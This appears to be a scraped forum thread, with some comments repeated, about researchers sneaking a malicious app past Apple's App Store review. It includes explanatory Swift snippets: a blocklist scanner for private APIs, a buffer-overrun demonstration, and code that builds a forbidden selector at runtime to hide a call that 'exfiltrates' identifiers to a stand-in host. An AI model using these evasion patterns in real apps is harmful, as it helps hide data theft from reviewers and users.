How does their exploit work? The app itself compiles and then runs the malware? But I thought sandboxing prevented that code from then being able to interrupt the code that belongs to other applications?
With the source, Apple could do some automatic checks, but ultimately a code review done by an expert would be the only way to be sure. I doubt these kinds of reviews can realistically be implemented; the cost would be huge. The only way this will ever change is if the compilation of the apps is done on Apple's servers.
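For what it's worth, the "automatic checks" half is easy to imagine. Something like the toy Swift scanner below just walks a submission's source tree and greps for selectors on a blocklist of private APIs; the directory name and the blocklist entries are made up for the example, and as the rest of the thread points out, a check this naive is trivial to evade.

```swift
import Foundation

// Toy "automatic check": walk a submitted app's source tree and flag
// files that mention selectors from a blocklist of forbidden/private
// APIs. The blocklist entries and directory name are invented examples.
let forbiddenSelectors = ["_setPrivateFlag:", "lockdownConnection", "sendSMSWithText:"]

func scanSources(in directory: String) {
    guard let files = FileManager.default.enumerator(atPath: directory) else { return }
    for case let file as String in files where file.hasSuffix(".swift") || file.hasSuffix(".m") {
        let path = (directory as NSString).appendingPathComponent(file)
        guard let source = try? String(contentsOfFile: path, encoding: .utf8) else { continue }
        for selector in forbiddenSelectors where source.contains(selector) {
            print("\(file): mentions forbidden API \(selector)")
        }
    }
}

scanSources(in: "./SubmittedApp")   // hypothetical submission directory
```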
Is this really new news? This was always possible, but it has a few problems.
[...]
2. If the app is good, why try and steal from users? The second problem is related to the first. If a developer spent a lot of time creating a good, functional app, then why would they hamper its performance by embedding malicious code?
[...]
They only reviewed it for a few seconds? wow.
The fact that it grabbed so much information is scary.
You completely misread the story and have no clue what you are talking about. That's scary.
How does their exploit work? The app itself compiles and then runs the malware? But I thought sandboxing prevented that code from then being able to interrupt the code that belongs to other applications?
The issue is that, if the walled garden cannot protect end users, then it has no value, or negative value. It certainly doesn't prevent outright copying or non-functional garbage apps, and it allows threats to the security of a user's private information that frankly are easy to sneak past the "genius" approval staff they have.
Hmm, I'd bet you don't even have any older than when you signed up. Older than me... that would have to be in wooden casks.

Who you callin' "kid"? I bet I have Mayonnaise in the fridge older than you.
But it does protect. They only got information from themselves because nobody downloaded the app except themselves. And if _you_ had downloaded that app and they had stolen information from you, you would now be able to sue Georgia Tech and two researchers at the university for huge amounts of money. The walled garden isn't just technical protection. It protects you because Apple knows the identity of the people putting an app on the store, so crooks can put up malware, but they can't get away with it, and that stops them. Plus Apple has the ability to effectively kill an app.
I do love the troglodytes of the Apple fan base.
P.S. More than 98% of all Android malware is found in Russian and Chinese app stores, or sideloaded... much like with many of those jailbroken iPhones (which don't get included in these malware studies, BTW). If you stick to official apps in either app store, you will likely never get malware. Common sense reigns supreme.
That is obvious, thanks.
My Social Security number is only 3 digits.

Hmm, I'd bet you don't even have any older than when you signed up. Older than me... that would have to be in wooden casks.
I like Apple's screening process for keeping out SOME of the bad guys.
I like it better for removing them after approval, once caught, and for having a paper trail pointing back to the criminal. Thus making it less worth their while.
I also like the OS design (better with each version) that limits what even CAN be done. Which needs to continue getting tighter, clearly.
I like these researchers, too! As long as they reported the issue to Apple privately long before dangling a treat in front of criminals. (That's good security practice, and if they didn't do it, and opted for attention instead, I don't like them so much... but I'll still take the benefit of their findings.)
Apple can never screen out and block everything anyone might try, but they've succeeded in making a safe, trusted platform that Android users can only dream of. AND it needs to improve--which can't happen without catching the loopholes.
How does their exploit work? The app itself compiles and then runs the malware? But I thought sandboxing prevented that code from then being able to interrupt the code that belongs to other applications?
The walled garden isn't just technical protection. It protects you because Apple knows the identity of the people putting an app on the store, so crooks can put up malware, but they can't get away with it, and that stops them. Plus Apple has the ability to effectively kill an app.
Probably they used the same method that jailbreaking uses... by exploiting a bug in the software.
Often that involves overrunning a buffer somewhere and injecting code.
Apple's spent years nailing down holes as soon as they're found, but if iOS7 is really a big rewrite as some claim, that'll just mean new holes.
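To make the overrun idea concrete, here's a deliberately contrived Swift sketch using unsafe pointers (ordinary Swift arrays are bounds-checked, so you have to opt out to even write this). A copy loop with no length check spills attacker-supplied bytes into adjacent data the program trusts; a real exploit goes on from corruption like this to redirecting execution, and every name here is invented for illustration.

```swift
// Contrived illustration of a buffer overrun. One allocation holds a
// 4-byte "input buffer" followed by a 4-byte "flag" the app relies on.
let storage = UnsafeMutablePointer<UInt8>.allocate(capacity: 8)
storage.initialize(repeating: 0, count: 8)
defer { storage.deallocate() }

let inputBuffer = storage        // bytes 0..3: where untrusted input belongs
let trustedFlag = storage + 4    // bytes 4..7: adjacent "trusted" state (0 = restricted)

// A careless copy with no length check: 8 attacker-chosen bytes are
// written into a 4-byte buffer, spilling into the adjacent flag.
let attackerInput: [UInt8] = [65, 66, 67, 68, 1, 1, 1, 1]
for (i, byte) in attackerInput.enumerated() {
    inputBuffer[i] = byte        // i >= 4 overruns into trustedFlag
}

print("flag bytes after copy:", (0..<4).map { trustedFlag[$0] })
// [1, 1, 1, 1] — the overrun silently flipped the adjacent state.
```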
That's exactly the way that other app stores work. Registration has long been the first defense, so that a malicious (or buggy) app can be traced back to its origin, and the developer notified or banned.
However, it's so easy to register as an Apple developer (look at all the people who do it sometimes dozens of times just to sell beta slots), that it's virtually useless as a preventative security measure. It's more about closing the door after the horse is gone.
I don't think it's all that major a rewrite. It's another version update, like any other, that happens to also coincide with a massive retheming of the entire OS.
Android developers have many more options to develop and distribute that are less restrictive in terms of vetting than the path required to be an iOS developer.
To me, there's really just one more basic option. iOS has a vetted store, and unofficial jailbroken options. Android has vetted store(s), official non-store sideloads (if you enable that), and unofficial rooted.
None of them are that restrictive, iOS included. The $100 fee does help keep out the hobbyist hacker though, which is why RIM used to charge that for a Blackberry code sign key.
The key differences between Apple's iOS and Google's Android are what Guido termed "design decisions" that both platform makers made that have created incentives and disincentives for mobile malware writers and cybercriminals in the intervening years, he said.
Foremost among them is Apple's insistence that mobile application developers verify their identity before they can introduce new applications. That includes submitting actual identifying documents like a Social Security Number or official articles of incorporation.
"There's something that gets back to you," Guido said. "That way, when Apple finds a malicious application, there's the possibility that you could suffer real-world punishment."
In contrast, Google's Android Marketplace and Google Play platforms have much more generous terms for developers, who must pay a small ($25) fee and agree to abide by the company's Developer Distribution Agreement to begin publishing. That's a low bar that makes it easy for malicious authors to get their wares out to hundreds of millions of Android users, according to Guido.
"You can upload dozens of applications at once. If any get banned, you can just resign, sign up under a new identity and resubmit them," Guido said.
Determining the "should not be there" part is not that easy. Unless you use blatantly forbidden calls you typically need to understand the context in which the call is used because in many context it could be perfectly legit. Not to mention that the call doesn't need to be explicit at all, you can even "exploit" your own application if you willfully leave the right bug open. Good luck finding that... it can be very difficult even for an expert analyzing the source code.It's possible to some degree with a binary as well, you can do a static analysis on the binary and look for calls that should not be there.
Determining the "should not be there" part is not that easy. Unless you use blatantly forbidden calls you typically need to understand the context in which the call is used because in many context it could be perfectly legit. Not to mention that the call doesn't need to be explicit at all, you can even "exploit" your own application if you willfully leave the right bug open. Good luck finding that... it can be very difficult even for an expert analyzing the source code.
You can do almost anything with the binary, but it becomes even more difficult, which means even more expensive. I doubt Apple will field a host of software engineers with skill and experience in reverse engineering and code analysis to verify every new application and update in the App Store, it's simply too expensive.
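To illustrate the "implicit call" problem: the dangerous selector never has to appear in the source, or in the binary's string table, as one literal, because it can be assembled at runtime (or downloaded after review). The Swift sketch below is purely hypothetical; the class and selector are invented, and in the real attack the target would be a private Apple framework method that isn't in the app's own code at all.

```swift
import Foundation

// Stand-in for some object that happens to respond to a "forbidden"
// selector. Everything here is invented for illustration; in the real
// attack the target would live in a private system framework.
class InnocentLookingHelper: NSObject {
    @objc func _sendDeviceIdentifiers(to url: NSString) {
        print("would exfiltrate identifiers to \(url)")
    }
}

// The selector name is pieced together at runtime, so the call site
// gives a grep-style scan (over source or over the binary's strings)
// nothing useful to match on.
let fragments = ["_sendDevice", "Identifiers", "To:"]
let selector = NSSelectorFromString(fragments.joined())

let helper = InnocentLookingHelper()
if helper.responds(to: selector) {
    // The actual call only materializes here, at runtime.
    helper.perform(selector, with: "https://collector.example" as NSString)
}
```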